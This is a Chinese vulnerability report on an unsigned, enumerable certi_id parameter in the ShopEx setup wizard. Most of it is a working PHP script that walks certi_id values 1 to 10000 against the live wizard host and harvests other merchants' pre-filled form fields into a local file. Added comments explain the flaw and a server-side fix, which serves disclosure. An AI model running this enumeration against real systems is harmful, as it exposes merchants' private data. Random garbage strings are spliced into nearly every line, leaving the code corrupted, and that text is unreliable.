|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
+ C& g( D" h* v9 d! w6 T
( b3 }# O+ k9 W2 ]' \/ M9 B7 G! Z2 d" M8 a
refer 参数经 base64 解码（base64 只是编码，并非加密）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
( a3 ]% b0 o3 |& y" x5 f6 M) C7 k& `# H+ t% Z
0 P) ^% H% r3 b4 s1 l5 J
' Y1 V" j- T) d
由于 refer 只是可逆的 base64 编码、没有签名，而 certi_id 又是连续整数，我们修改 certi_id 即可遍历所有使用了ShopEx程序的网站
4 ` ?+ z0 [8 R7 z9 O2 H c m% E# L" k* ~# C3 z
: e3 a: w! e" r) Q9 u( R# \. s$ X
7 U4 z3 s6 c6 k& X<?php
9 |) B1 d3 W2 g$ @3 T1 b* P4 A' d: l$ @! L. J% \, a& H
// Review note: proof-of-concept driver for an insecure direct object reference
// (IDOR).  certi_id is a small sequential integer, so a plain counter is enough
// to walk every registered shop.  The defence belongs server-side: the wizard
// must check that the caller is authorised for that certi_id (or use an opaque,
// signed, expiring token) -- changing the client-side encoding does not help.
// Thousands of consecutive step2.php requests from one client are also an
// obvious detection signal in the web-server logs.
for ($i=1; $i < 10000; $i++) { // enumerate
* X2 ?% Q8 _" A& v- C. i. N/ y4 T
; k) d+ n7 `/ W/ K3 k ShowshopExD($i);. O, @/ G4 T1 R' u7 C
8 e9 l) K. F' z4 u, }$ N
}3 n- k' R) c$ H( ~' h% C# z
// Review note: one probe of the ShopEx setup wizard for a single certi_id.
// The refer parameter is nothing more than base64 of client-chosen JSON -- no
// signature and no binding to an authenticated session -- so whoever presents
// a certi_id is served that merchant's pre-filled wizard form.  Base64 is an
// encoding, not authentication; the fix is a server-side authorisation check
// on certi_id (or an opaque signed token), not a different client-side encoding.
//
// $cid  certi_id to probe; coerced with intval() before being embedded.
// Side effects: one HTTP GET to guide.ecos.shopex.cn, echoes the scraped
// name:value pairs to stdout, and appends them to c:/shopEx.txt when the
// response echoes the refer token back.
5 w. ^! v( I6 b function ShowshopExD($cid) { y) n- k9 @3 W/ j
; I: w# p% J$ f$ X4 V4 G7 @ $url='http://guide.ecos.shopex.cn/step2.php';. J# u- U! W. ~' t$ V- T* r8 B
* L$ i7 s% G4 g6 j" }5 V* L/ m, l
// callback_url is a placeholder here; the probe succeeding with it suggests
// the server does not tie callback_url to the certi_id either -- unconfirmed.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ N8 W6 b0 \0 H5 k/ s( B
- \! K: D% ?. X+ C8 c+ J3 U. J $url = $url.'?refer='.$refer;
' ]/ v) H; r: A9 K L! @" M
) K" @% [0 I% p. I $ch = curl_init($url);3 V, D- b; H, T6 G. \
" F( n! L$ T8 z3 {0 B0 D curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
6 A$ Z6 x- L* _! O# C. f4 N% r8 a) n5 e
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;) P5 @2 n9 |0 \ b8 m
0 ~1 L% D! y, H+ n. z9 e
// No curl_error() check: a transport failure yields false and the strpos()
// below simply treats it as "no such certi_id".
$result = curl_exec($ch);
2 b( g* Q/ x& |) z2 d0 d- ^9 L& q. s
// Re-encoded to GB2312, presumably for a Chinese Windows console (the output
// path below is on C:) -- TODO confirm.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");3 ~3 r' _3 v, c$ ^
0 L5 ~ f) j1 N9 B0 ?% `+ M
// Existence heuristic: the wizard page echoes the refer token back into its
// HTML when the certi_id is known to the server.
if(strpos($result,$refer))/ f% q9 N5 P4 @2 w
$ E% p$ }' p n
{
5 P' h( Q" |1 |1 K) }# q7 W/ e. d; a8 i8 }2 U; Q6 h2 D9 K" x
$fp = fopen("c:/shopEx.txt",'ab'); // append the scraped name:value pairs to the output file
8 ?/ O- Q7 d/ I8 A4 z
// This is the actual disclosure: every pre-filled <input type="text"> in
// another merchant's setup form is harvested by name and value.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);0 ^/ w3 n' U; s$ C8 q5 `
: i4 L, ?8 Z0 w6 x* E1 k1 }# ]
foreach ($value[1] as $key) {3 v, F/ u1 J. A# O
// $res[1] is the name attribute, $res[3] the value attribute of one input.
9 r' D8 T6 T: ]% Z preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);/ d$ T8 O3 g. _
4 ]% m# z# q. p$ y echo $res[1][0].':'.$res[3][0]."\r\n";
6 y8 D4 v8 U6 u4 Y; p J9 @0 t9 c C( I& q: I& \/ q
$col =$res[1][0].':'.$res[3][0]."\r\n";
, [4 |* j& P6 m) z$ N$ o0 L# n I) I* ?2 d8 ?' g
fwrite($fp, $col, strlen($col)); ( x4 t6 p" R1 S7 j/ E
l; N- z2 t0 {7 N }
% j% g( [' B" K" }" P/ Y" {* }/ a
// Separator between shops in the console output.
5 |. k8 `' a# y* g7 J7 A echo '--------------------------------'."\r\n";
$ Q) n& Q5 L' g2 i8 O6 e- z; @$ u8 C8 c; b
fclose($fp); 6 H1 K% ]/ o% C8 r X1 f6 T
& w, {$ a3 q! f }$ o. V: K1 l% \1 Y: j. `. {
// Flush the output buffer so progress is visible while the outer loop runs.
! F+ Z; o+ T1 K5 v# s1 S flush();
% Z W: {5 b$ P2 R8 c. R3 o$ D
, Z" ~# a" }$ ^( | curl_close($ch);: a5 Z' ]" q7 P/ d" L8 a- c* L
% _8 u& b) v( l2 E3 e" k
}
, A) E6 N. S! E' t5 l. b G& I3 {7 h( I9 _: A
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式
|
|